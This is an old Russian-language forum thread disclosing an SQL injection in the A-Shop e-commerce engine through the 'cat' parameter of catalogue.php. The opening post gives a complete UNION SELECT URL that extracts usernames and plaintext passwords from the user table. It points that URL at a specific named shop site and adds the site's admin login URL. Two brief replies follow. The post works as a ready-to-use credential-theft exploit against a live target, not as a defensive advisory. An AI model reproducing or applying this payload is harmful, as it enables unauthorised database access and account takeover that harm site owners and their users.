уязвимость движка A-Shop

Тема в разделе "Статьи и Co", создана пользователем +VAMPIR+, 1 янв 2008.

Статус темы:
Закрыта.
  1. +VAMPIR+

    +VAMPIR+ Master

    Регистр.:
    13 апр 2006
    Сообщения:
    534
    Симпатии:
    615
    А-Shop - Версии: 4.4.1(возможно и более ранние) - 4.7.х(last)

    SQL-инъекция с доступом в user и с незашифренными пасами.

    Уязвимость в catalogue.php , переменная cat, фильтрации никакой нет. Колличество столбцов 33,32 или 2.

    Пример:

    CODE

    http://www.the123d.com/shop/catalogue.php?cat=- 21+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
    ,21,22,23,24,25,26,27,28,29,30,31,32+from+user/*

    Админка:
    http://www.the123d.com/shop/admin/login.php
     
  2. skabbit

    skabbit Постоялец

    Регистр.:
    6 дек 2007
    Сообщения:
    88
    Симпатии:
    1
    я аж сайт разработчика найти не могу, такой скрипт интересный. :confused:
     
  3. ssanjarr

    ssanjarr Писатель

    Регистр.:
    10 янв 2008
    Сообщения:
    2
    Симпатии:
    0
    мне тоже интересно
     
Статус темы:
Закрыта.